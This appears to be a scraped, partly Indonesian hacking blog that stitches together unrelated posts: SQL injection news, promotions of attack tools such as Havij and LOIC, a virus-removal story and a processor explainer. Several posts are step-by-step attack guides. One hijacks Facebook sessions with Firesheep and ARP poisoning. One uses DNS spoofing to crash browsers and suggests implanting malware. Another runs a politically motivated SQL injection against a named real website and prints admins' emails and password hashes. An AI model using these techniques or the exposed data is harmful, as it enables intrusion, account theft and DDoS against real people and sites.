Total Tayangan Halaman

CLOCK

'

Unknown

Keep Your Database Free from SQL Injection Attacks




SQL injection attacks have become a hot topic again, following Computerworld's report that Oracle.comsuffered such an attack this week. This kind of attack, one of the most well-known and dangerous but least understood, was used to breach the security of Oracle's customer website, exposing usernames and, in some cases, passwords.

To protect your databases, check out our excerpt from Justin Clarke's "SQL Injection Attacks and Defense." The excerpt explains in detail exactly what an SQL injection is and how it works so you can take appropriate steps to minimize vulnerability.

You should also take a look on our password creation and management resources, since these "stolen passwords" lists often expose users' lackadaisical attitudes towards creating hard-to-break passwords. These sample policies and policy templates can make sure that weak passwords don't compromise data security:

SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim




SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim (Admin Bangladesh Cyber Army). Here is the report Submitted By Shadman to VOGH. 

REPORT:-

Very Big and Critical Vulnerability detect in Google Lab System. Vendor is already reported. But they don’t take positive step in this case this vulnerability is now exposed and open in public. Now I tell details About the Vulnerability in Google Lab System.
Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this
Vulnerability is Exploitable. We can get Tables, columns and data. Google Lab
Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system. And this vulnerability is 100% real and Now We can see this in our eyes. 

Now I give you Step by step proof about this Vulnerability.


2. Vulnerability type: SQL Injection

Info:
6. Host IP: 209.85.175.141
7. Web Server: Google Frontend
8. Keyword Found: Fast
9. Injection type is Integer
10. Keyword corrected: Swirl

Let’s Check Exploiting this Vulnerable link. Here I use 3 Famous SQL Injection
tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

You Can Download the Video Of This Vulnerability VIDEO LINK
To Download the Full PDF report Click HERE

SQLol -SQL-i Vulnerability Testing Framework




In the Austin Hackers Association meeting they released SQLol. SQLolis a configurable SQL injection testbed. It allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. The author thought about different data extraction techniques from SQL injection flaws and found that a vulnerability framework that includes SQLi verbose error extraction techniques was never found. To be precise, the author never came across a vulnerability framework that includes SQL injection in a DELETE query. So, with this aim in mind, SQLol was born, specifically for SQL injection flaws. It can be useful to those who know nothing about SQL injection, or those who know a bit of it. SQLol comes with a set of challenges which help you with performing some flavor of SQL injection and have pre-configured settings.

Options:-
  • Type of query
  • Location within query
  • Type and level of sanitization
  • Level of query output
  • Verbosity of error messages
  • Visibility of query
  • Injection string entry point


Other Cool Things:-
  • Reset button
  • Challenges
  • Support for multiple database systems


Requirements:-
  • PHP 5.x
  • Web server
  • Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
  • ADODB library (included)

To Download SQLol Click Here

NTO SQL Invader: A SQL Injection Tool





NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, we will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.

Features:-

  • Easy to use – The tool’s GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straignt from an application scan report. You can then control how much information is harvested.
  • Clearly presents evidence – Unlike tools that provide all data via command line, NTO SQL Invader provides the data in a organized manner that is useful for both executive meetings as well as technical analysis and remediation.
  • Enables easy transport of logging data – All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC.
To Download NTO SQL Invader Click Here

Havij v1.16 Advanced & Automated SQL Injection Tool Released



One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-
  • Multithreading
  • Oracle Blind injection method.
  • Automatic all parameter scan added.
  • New blind injection method (no more ? char.)
  • Retry for blind injection.
  • A new method for tables/columns extraction in mssql blind.
  • A WAF bypass method for mysql blind.
  • Getting tables and columns even when can not get current database.
  • Auto save log.
Bug Fixed:- 
  • url encode bug fixed.
  • Trying time based methods when mssql error based and union based fail.
  • Clicking get columns would delete all tables.
  • Reseting time based method delay when applying settings.
  • Oracle and PostgreSQL detection
  • For additional information & to Download Havij v1.16 Click Here 
      

Cara Membunuh Virus Win32 Virut.Ce



Beberapa hari yang lalu saya sempat kesal dan di buat sibuk oleh kehadiran virus yang merusak file exe ini.

Virus ini menular ke sistem komputer saya sendiri dikarenakan anti virus saat itu memang dan biasa saya matikan dan hanya dihidupkan secara manual saja dikarenakan memberatkan sistem.

Bagi saya pribadi sebetulnya tidak memerlukan anti virus yang harus aktif otomatis, karena setiap saya menemukan atau menjalankan program baru pasti di scan manual terlebih dulu.

Tapi sialnya adik saya yang memang masih baru kenal dengan komputer, menjalankan satu program tanpa sepengetahuan saya dari Flash Disk, dan program tersebut telah terjangkit oleh virus virut.ce, dan boom komputer langsung restart dan kembali menyala dengan keadaan virus telah aktif dan menginfeksi file lainnya.

Kesal dan menyesal juga anti virus tidak dihidupkan, tapi apa mau dikata virus kini sudah terlanjur aktif dan menginfeksi.

Sebelumnya saya belum mengetahui jenis virus apa yang menginfeksi komputer, lantas saya coba scan active process dengan anti virus kesayangan Avira Personal, dan dengan sangat jelas avira memberitahukan bahwa beberapa program sudah terinfeksi seperti explorer.exe, spoolsv.exe, dan beberapa file system lainnya.

Dalam keadaan terinfeksi akhirnya saya coba mengkoneksikan komuter ke internet, walau saya tahu kalau virus ini juga akan menyebar spam bila kita terhubung ke internet, namun karena tak ada pilihan lain, mau tidak mau akhirnya saya sambungkan saja ke internet.

Setelah beberapa menit googling untuk mencari solusi membunuh virus ini, akhirnya saya menemukan program untuk menormalisir sekaligus membunuh virus win32 virut.ce.

Program tersebut bernama Virutkiller, yang saya download dari web support kaspersky ( http://support.kaspersky.com/viruses/solutions?qid=208280756 ) yang katanya bisa menyembuhkan file yang telah diinfeksi oleh virut.ce.

Setelah selesai download, saya lalu mengikuti petunjuk dari web tersebut.
pertama saya non-aktifkan system restore dan memutuskan hubungan ke internet, dan lalu menjalankan program virutkiller ini. Dan ternyata hampir semua file exe terinfeksi oleh virus virut ini. Berikut screenshot pada saat virutkiller membersihkan virus win32 virut.cedari memory dan dari local disk.




Setelah selesai program virutkiller meminta restart dan setelah restart akhirnya virus tersebut sudah hilang dari process. Namun setelah saya coba scan ulang pada folder-folder tertentu ada beberapa file yang tidak bisa di kembalikan oleh virutkiller, diantaranya Photoshop.exe dan Imageready.exe. Dan terpaksa saya hapus 2 file tersebut.

Untuk memastikan saya pun mencoba scan ulang komputer menggunakan rmvirut, dan hasilnya tidak ada file yang terinfeksi. untuk link rmvirut cari sendiri ya :D.

Sampai di sini ternyata masalah belum selesai, karena ternyata setelah anti virus avira dihidupkan, malah mash mendeteksi virus aktif dan pasif di beberapa folder.

Namun kali ini avira mendeteksinya sebagai TR/Patched.gen, mungkinkah ini dikarenakan perbaikan yang dilakukan oleh virutkiller tidak sempurna sehingga membuat avira masih mendeteksi adanya virus. Atau mungkin cuma false alarm avira saja.


Karena tidak nyaman dengan keadaan ini akhirnya saya coba scan ulang seluruh folder system menggunakan avira yang sudah terupdate tentunya dan hasilnya hampir seluruh file masih terdeteksi virus.

Dan akhirnya saya putuskan untuk memperbaiki/merestore file system tersebut menggunakan command SFC / scannow, dan memasukan CD installer ke CD drive.

Perintah sfc /scannow hanya bisa digunakan pada Windows XP SP3 ke atas, so kalau anda masih menggunakan XP SP2 perintah tersebut kemungkinnan tidak ada.
berikut tampilan command/perintah tersebut :


Setelah menunggu kurang lebih 20 menit, proses perbaikan atau restore file system pun selesai dilakukan, dan kini avira tidak lagi mendeteksi adanya virus di system komputer, karena file system komputer sudah kembali seperti waktu install baru.

Namun beberapa aplikasi pihak ketiga seperti media player classic dan lainnya harus di repair atau di install ulang agar avira tidak mendeteksi sebagai virus.

Dan akhirnya setelah kejadian terinfeksi virus win32 virut.ce ini saya selalu menghidupkan anti virus secara otomatis, walau mungkin butuh resource komputer lebih, tapi mungkin saya tidak lagi disibukkan dengan virus :D.

Dan akhirnya, kejadian ini menjadi pengalaman sekaligus ilmu baru bagi saya, dan semoga juga berguna bagi anda yang membutuhkannya.

Mengenal Lebih Jauh Prosessor



VIA C3 
Fungsi prosessor pada komputer identik dengan fungsi otak pada tubuh manusia. Seperti layaknya otak manusia yang mengontrol seluruh organ tubuh manusia, demikian juga prosessor-lah yang mengontrol seluruh kerja dari semua perangkat komputer.



Fungsi prosessor dalam perangkat komputer :
  1. memproses data perintah dari hardisk melalui RAM.
  2. menerima input dari mouse dan keyboard untuk diproses.
  3. memproses data untuk ditampilkan ke layar monitor melalui VGA.
  4. memberi kode data perintah kepada printer untuk mencetak.
  5. menerima data perintah dari modem atau jaringan LAN untuk diproses sehingga antara komputer satu dengan yang lainnya dapat berkomunikasi.
  6. dll

Jenis-jenis prosessor berdasar soket-nya :

Prosessor Intel
Merk prosessor ini yang paling terkenal dan banyak digunakan.


  • Intel 386
  • Intel 486 bekerja pada Soket 3
  • Intel Pentium I bekerja pada soket 7
  • Intel Pentium II bekerja pada soket 370 dan Slot 1
  • Intel Pentium III bekerja pada soket 370
  • Intel Pentium 4 bekerja pada soket 478
  • Intel Pentium 4 LGA bekerja pada soket LGA 775
  • Intel Dual Core bekerja pada soket LGA 775
  • Intel Core2Duo bekerja pada soket LGA 775
  • Intel Quad Core bekerja pada soket LGA 775
  • Intel Generasi Core I3, I5, I7 bekerja pada soket LGA 1155/1156 (terbaru untuk saat ini)

Prosessor AMD
Prosessor merk AMD sebagai pesaing berat satu-satu nya bagi prosessor Intel sampai saat ini. Namun nama AMD tidak sepopuler nama Intel. Prosessor AMD lebih disukai bagi kalangan pecinta games. AMD menawarkan kualitas kecepatan yang setara dengan Intel namun dengan harga yang lebih murah. Untuk membandingkan performa Intel VS AMD mungkin bisa di bahas dalam posting tersendiri, karena Intel maupun AMD ada plus maupun minus tersendiri.


  • AMD Sempron bekerja pada soket 754
  • AMD Athlon bekerja pada soket 939
  • AMD Athlon X2 bekerja pada soket AM2
  • AMD Athlon X3 bekerja pada soket AM3
  • AMD Phenom bekerja pada soket AM3

Prosessor VIA
Namanya pernah beredar ikut meramaikan bersaing pada era Intel Pentium 3, pada saat itu prosessor VIA disukai karena harganya yang lebih terjangkau dibanding Pentium 3. Namun seiring keluarnya prosessor Pentium 4, nama VIA lambat laun mulai menghilang.
  • VIA C1 setara Pentium I
  • VIA C2 setara Pentium II
  • VIA Cyrix bekerja pada soket 370
  • VIA C3 bekerja pada soket 370
Demikian sedikit pengetahuan pembahasan tentang Processor, kurang lebihnya saya minta maaf.

Membajak Account Facebook Dengan Firesheep – Gimana sih caranya???


Masih Ingat dengan Firesheep??? add on Mozilla Firefox yang diklaim bisa mengambil alih account facebook, gmail, wordpress, twitter dsb?.Banyak yang memang meragukan jika add on ini benar-benar bisa bekerja dan penulis telah membuktikan sendiri bahwa Firesheep berhasil mengambil alih account facebook dalam area WLAN.

Kebanyakan masalah yang muncul ketika dijalankan pada area hotspot/ WLAN adalah di side bar firesheep muncul peringatan “Could not open device Device blablablabla{nama wireless card} : failed to set hardware filter to promiscuous mode” . DOOH… kita mati langkah disini karena add on tersebut memang sudah tidak berguna lagi jika anda menemukan pesan diatas.
Sebelum putus asa, ada baiknya kita cari tahu apa sih maksudnya promiscuous mode?
Perlu diketahui bahwa saat paket internet dikirimkan dari suatu komputer, paket tidak langsung sampai pada komputer tujuan. paket disebar ke seluruh komputer pada jaringan. sehingga seluruh komputer mendapat paket jaringan tersebut.
normalnya jka paket itu tidak sesuai dengan alamat kompukter yang menerima, maka paket akan langsung ditolak. namun berbeda dengan host yang menggunakan promiscuous mode, walaupun tujuan paket bukan untuk host tersebut, paket akan diterima sehingga memungkinkan paket yang bukan haknya dibaca tanpa sepengetahuan sumber. hal ini kemudian memunculkan istilah sniffing yakni memonitor paket jaringan yang ada untuk kemudian dianalisa lebih lanjut.
pada awalnya sniffing digunakan untuk memudahkan seorang admin atau staff it didalam suatu jaringan untuk memonitor paket jaringa guna melakukan maintenance atau disaster recovery.
namun hal ini pula dimanfaatkan oleh orang untuk memonitor paket jaringan salah satunya melihat data authentifikasi yang bersifat private lewat sniffing tersebut.(sumber : magztitut.worpress.com)
Firesheep di Windows XP SP3
Masalahnya tidak hanya pada network card yang tidak memiliki kemampuan untuk menginjeksi atau menangkap paket data yang berlalu lalang didalam jaringan WLAN. Driver juga menjadi kunci utama suksesnya menjalankan Network card dengan promiscuous mode. Nah masalah ini memang ditemukan penulis ketika menjalankan firesheep di Windows XP dimana Penulis menggunakan laptop Acer Aspire 4736z dan network card dengan Chipset Atheros AR928X. Firesheep benar-benar sampah di WinXP dengan driver bawaan vendor. Penulis juga sudah mengganti driver Network card bawaan vendor dengan driver dari Airopeek dan CommView (rekomendasi driver untuk wireless hacking di Windows), tetapi hasilnya tetap nihil.
Firesheep di Windows 7 Ultimate
Yang digunakan penulis di Windows 7 adalah
[-] Firefox versi 3.6.12
[-] Cain & Abel v.4.9.36
[-] Winpcap bawaan dari Cain & Abel
[-] Wireshark V.1.2.2 (SVN Rev 29910)
Kemudian penulis mencoba menjalankan Firesheep di Windows 7 dimana network card menggunakan driver bawaan dari Windows 7 itu sendiri. Firesheep di Windows 7 memang tidak menampilkan pesan “Could not open device Device blablablabla{nama wireless card} : failed to set hardware filter to promiscuous mode” di firefox 3.6.12. Itu artinya di Windows 7, driver bawaan Microsoft sukses menjalankan network card Atheros AR928X dalam modus promiscuous.
Tetapi masalahnya saat ini adalah firesheep hanya menangkap paket data dari laptop penulis saja. data yang berasal dari laptop lain tidak berhasil ditangkap sehingga hanya account facebook milik penulis saja yang muncul di bar friesheep. hmmmm… belum saatnya putus asa.
Saya berpikir, mungkin perlu adanya proses meracuni lalu lintas data pada Router wireless yang kita kenal dengan teknik ARP Poisonning. proses ini adalah dimana penulis menyadap paket data dengan cara membelokkan semua lalu lintas data di area hotspot dan membuat seolah-olah laptop penulis adalah sebuah gateway yang dikenali oleh laptop lain. caranya, penulis menjalankan Cain & Abel

Disaat itu, penulis sedang berada di rumah rekan kita , pak Akhiang yang mengijinkan laptopnya dijadikan sasaran serangan Man in the middle attack. :) . IP address laptop aKhiang di WLAN adalah 192.168.10.100 dan IP gateway routernya 192.168.10.1. Penulis menyadap pertukaran data diantara kedua komunikasi mesin tersebut.

Selain dengan CAIN, penulis juga menjalankan Wireshark untuk membantu pengiriman ARP reply palsu ke host.

Beberapa saat kemudian, Firesheep berhasil menangkap Cookie Account facebook milik Akhiang dan Binggo, Penulis menjalankan Accountnya tanpa perlu mengetahui Password-nya. Firesheep Has been succesfully hijack the cookie.

Membuat Crash Browser User Dalam Satu WLAN Area – Remote Browser Buffer Overflow Exploit


Berikut saya akan membagikan teknik meng-exploit pengguna Firefox dan Opera dalam sebuah area WLAN dimana kita bisa membuat browser users crash. Yang perlu disiapkan adalah :
[-] Wamp server vers 2. yang bisa download di http://www.wampserver.com/en/download.php
[-] Cain & Abel v.4.9.36
Konfigurasi WAMP sebagai web server
Sebelum melangkah lebih jauh, mari kita berkenalan dulu dengan WAMP. Wamp adalah paket web-server (Apache, MySQL dan PHP/Perl/Python) yang digunakan pada sistem operasi Windows, Dengan WAMP, kita bisa membuat komputer rumahan menjadi sebuah webserver dimana WAMP ini sangat berguna untuk belajar webdesign, programming web atau hanya ingin tahu bagaimana cara kerja seorang web-designer bekerja.
Setelah anda install WAMP, jalankan Wamp Webserver tersebut.
Di tray Windows anda, klik pada icon tray wamp dan pilih Start All services.

setelah itu coba buka Browser anda dan masuk ke http://localhost . Jika berhasil, maka akan masuk ke halaman index webserver wamp seperti gambar diatas. Jika anda tidak bisa membuka halaman web di localhost anda. coba restart komputer dan jalankan kembali WAMP server.
Setelah berhasil menjalankan webserver pada Localhost, sekarang kita perlu setting WAMP server supaya webserver bisa diakses oleh user lain dalam satu jaringan.
Sebagai contoh implementasi webserver untuk diakses dalam jaringan,di browser coba ketik IP address anda dalam WLAN.

Untuk mengetahui IP anda dalam WLAN, jalankan cmd.exe dan ketik ipconfig. Misalkan di dalam jaringan, IP address anda adalah 182.2.22.38, ketik IP tersebut http://182.2.22.38. Jika di browser anda muncul tulisan
Forbidden
You don’t have permission to access / on this server.

Itu adalah wajar karena setting di WAMP server hanya mengijinkan web diakses oleh komputer anda sendiri. Untuk itu kita perlu mengatur setting tersebut supaya server web kita bisa diakses oleh user lain dalam jaringan.

Klik WAMP di tray anda, pilih Apache – httpd.conf. file httpd.conf akan bisa diedit dari notepad.

cari barisan script
DocumentRoot “c:/wamp/www/”
#
# Each directory to which Apache has access can be configured with respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories).
#
# First, we configure the “default” to be a very restrictive set of
# features.
#

Options FollowSymLinks
AllowOverride None
Order Deny,Allow
Deny from all


dan
# onlineoffline tag – don’t remove
Order Deny,Allow
Deny from all
Allow from 127.0.0.1

Hapus script
Order Deny,Allow
Deny from all
dan
Deny from all
Allow from 127.0.0.1
save httpd.conf tersebut dan Klik WAMP di tray anda, pilih Restart All Services. Tunggu beberapa saat dan coba masuk ke IP address anda dalam WLAN. jika berhasil. itu artinya kita siap lanjut ke langkah berikutnya.
Membuat Script untuk crash Firefox dan Opera
Buka notepad dan masukkan script dibawah ini atau Download script Crash Firefox & Opera dan save dengan nama index.php

Simpan file index.php tersebut ke direktori WAMP server C:wampwww
Buka kembali http://182.2.22.38 dengan Firefox atau Opera. Jika Browser anda Hang. artinya langkah ini sudah berhasil . Kita lanjutkan ke langkah Berikutnya.
Tetap jalankan WAMP server di laptop kita.
DNS Spoofing dengan Cain & Abel
Pastikan anda sudah mengkonfigurasi network card di Cain & Abel secara benar. Klik Configure dan di tab Sniffer pilih Network Card anda.

Scan Host dalam jaringan, klik start/stop sniffer klik start/stop APR dan masuk ke tab Sniffer lalu klik tombol Add to list (tombol bergambar +). tunggu beberapa saat dan laptop yang aktif dalam jaringan akan terdeteksi.

Alihkan semua paket lalu lintas data jaringan WLAN ke laptop kita di tab sniffer bagian APR, klik tombol + dan masukkan semua IP yang ada dalam jaringan WLAN.

Ubah DNS Request user dalam WLAN dengan melakukan DNS Spoofing.
Di tab sniffer bagian APR, pilih APR-DNS lalu klik tombol +. lalu kita akan melihat sebuah tabel untuk mengisi alamat website yang akan dialihkan ke halaman index.php WAMP webserver kita.
Di area WLAN, kira-kira kita bisa menebak website apa yang sering dikunjungi oleh user, misalnya facebook.com. di kolom DNS name requested isi dengan www.facebook.com dan kolom IP address to rewrite in response packets ini dengan alamat IP address kita dalam WLAN. Anda juga bisa mengisinya dengan website lain seperti www.google.co.id, dsb.
Tunggu beberapa saat sampai user melakukan klik di www.facebook.com, Browser Firefox atau Opera mereka akan Crash karena ketika user dalam WLAN mengunjungi facebook, mereka akan dialihkan ke halaman index web server kita :) .
Jika kita mengerti bahasa web programming, index.php bisa diubah sedemikian rupa sehingga hacker bisa menyusupkan malware, menjalankan program secara remote dan banyak lagi hal lainnya. percayalah hacker bisa mengambil alih laptop anda di dalam jaringan WLAN/Hotspot.
Pencegahan – melindungi laptop anda dalam WLAN area
[-] Firewall – Gunakan firewall seperti Zone Alarm (http://www.zonealarm.com/)
[-] Install add-on NoScript untuk firefox (https://addons.mozilla.org/firefox/addon/722)
[-] Gunakan Software Anti ARP (http://www.antiarp.com/english_56.html)

Low Orbit Ion Cannon – Tool DDOS pendukung Wikileaks



Download Low Orbit Ion Cannon
Jika tool ini tidak berjalan, Download .net framework versi 4 dari microsoft
Beberapa waktu yang yang lalu, Wikileaks dicekal oleh amrik dan beberapa website seperti mastercard dan paypal menutup akses dana ke founder Wikileaks, akibatnya sebuah kelompok hacker 4chan melakukan serangan DDOS ke website yang menolak Wikilieaks, alhasil mastercard sempat down. nah. mereka menggunakan tool DDOS yang dinamakan LOIC (Low Orbit Ion Cannon). ane share buat kmu untuk referensi .
semoga berguna

SQL Injection/LFI/XSS Vulnurable & Webshell Scanner

Sql injection scanner
XCode SQLI/LFI/XSS Vulnurable & webshell Scanner
Download XCode Exploits Scanner [re-patch September 2011]
USAGE:
Once downloaded, extract all the files and run XCodeXploitScanner.exe, insert your dork, Click Dork It and it will collect links from Dork you enter and displays the list. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in the list. This tool will send the injection parameters to the web as’ – * /../../../../../../../../../../../../. . / .. / etc / passwd% 00 “> alert (” XSS Xcode Exploit Scanner detected “). If the Web has a bug then the status will appear: www.target.com?blabla.php?=1234: SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../. . / .. / etc / passwd% 00 LFI Vulnerable
www.target.com?blabla.php?=1234 “> alert (” XXS Xcode Exploit Scanner Detected “) XSS Vulnerable
At the status list is detected, you can click Open Vuln Link with Browser to display on your browser
This tool also adds webshell hunter, where you can search the web shell C99, R57, C100, ITsecteam_shell, b374k, which had been uploaded by the hackers.
Perhaps there are many shortcomings or bugs are not known by the author. But at least this tool you can make it easier to find targets.
Hopefully Helpful
PENGGUNAAN
Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ‘ – * /../../../../../../../../../../../../../../etc/passwd , “>alert(“XSS DETECTED XCode Exploit Scanner”) . Jika Web tersebut memiliki bug maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
www.target.com?blabla.php?=1234″>alert(“XXS DETECTED XCode Exploit Scanner”) XSS Vulnerable
Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda
Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.
Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.
Semoga Berguna
Screen Shot

LFI Vulnerable

Web Shell Hunter


================================================================

[Tutorial] SQL Injection menggunakan Havij Vers 1.10



Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini (Hey r3dm0v3.. u coded an awesome tool)


Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm.... kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).

web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ' pada web tsb:
Code: Select all
http://www.xenia.co.il/index.php?page_id='93

hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection

Image

Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....

Image
hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables

Image
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).

Image
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1


nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass

(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan

Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff

w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya

Image
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching

Image
Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
Image
UH,,,, bahasanya sama sekali ga bisa dimengerti... :circle:
.::...Cr3ditz......::....

Tehnik Sederhana Analisa Virus


Virus entah local atau impor udah merajalela di dunia ini,kadang kala kita bingung dan dibuat pusiiing tujuh keliling oleh ulah para V-Maker,ada yang kehilangan data,ada yang OS nya hank,dan masih banyak lagi,dan para V-Maker di nun jauh disana pastilah hanya tersenyum dan berkata “kaciaan deh lo..wkwkw”,tapi untungnya setiap perbuatan pasti ada akibatnya,ada virus pasti ada antivirus yang bisa membasminya,tapi kadang orang awam kan hanya asal download AV trus pake tanpa tahu gimana sih para pencipta AV menemukan cara kerja virus dan cara membasminya. Temen-temen ada yang tahu??atau temen-temen bisa nih baca tulisan saya yang butut ini. Ok sebelum menganalisa virus kita siapkan dulu peralatannya…
1.Aplikasi ThinApp ( Download1Download 2 )
2.Virus tentunya
3.Computer (direkomendasikan menggunakan virtual machine,biar data lebih aman gan,plus depfrezee kalau suka pake itu)
Install lalu Jalankan ThinApp di computer anda semua,trus setelah selesai klik “ThinApp Setup Capture”,lalu lakukan scanning,sangat lebih baik bila computer kita dalam kondisi fresh atau belum terinstall aplikasi apapun,kecuali ThinApp tadi..(makanya diawal tadi saya bilang pake virtual machine+depfreeze)



Proses scan nya gak lama kok,paling banter thu 10 detik gak nyampe,lalu jalankan virus yang udah ente semua siapkan tadi (thinApp nya jangan di close lho ya)contoh,disini saya habis download sampel virus di internet,dikasih namanya sih “aqiel” dan saya belum tahu cara kerja ni virus gimana…

Setelah dijalankan,lalau kita kembali ke ThinApp tadi,lalu klik”postscan”,nha disini nih agak lama bisanya scanning nya,soalnya dia harus meng-compare kan hasil scan sebelum virus dijalankan dan sesudah virus dijalankan..


Yup,selesai sudah scanning nya,biasanya sih 3 menit kalau dikomputer saya lho,maklum kompie butut he he he,disini akan muncul nama program yang kita jalankan tadi,pada pilihan “show entry points used for debugging” gak usah di checklist karena kita gak pengen menjalankan file virus tadi berulang-ulang

Pada bagian ini langsung kita next,next,lalu save,soalnya gak ada yang pelu ane jelasin disini,tentunya temen-temen semua dah paham isinya..he he he



Setelah itu kita pilih “open project”,dimana kita akan mulai menganalisa virus tadi,lalu klik cancel dan kita buka project kita tadi…


program Thin App akan menciptakan 3 file txt yang mewakili registry yaitu HKEY_CURRENT_USER.txt,HKEY_LOCAL_MACHINE.txt dan HKEY_USERS.txt dengan bermodalkan file tersebut kita bisa cek satu-persatu perubahan yang ada di registry
contoh yang saya buka di HKEY_LOCAL_MACHINE.txt
isolation_writecopy HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
Value=AntiVirusDisableNotify
REG_DWORD=#01#00#00#00
Value=FirewallDisableNotify
REG_DWORD=#01#00#00#00
Value=UpdatesDisableNotify
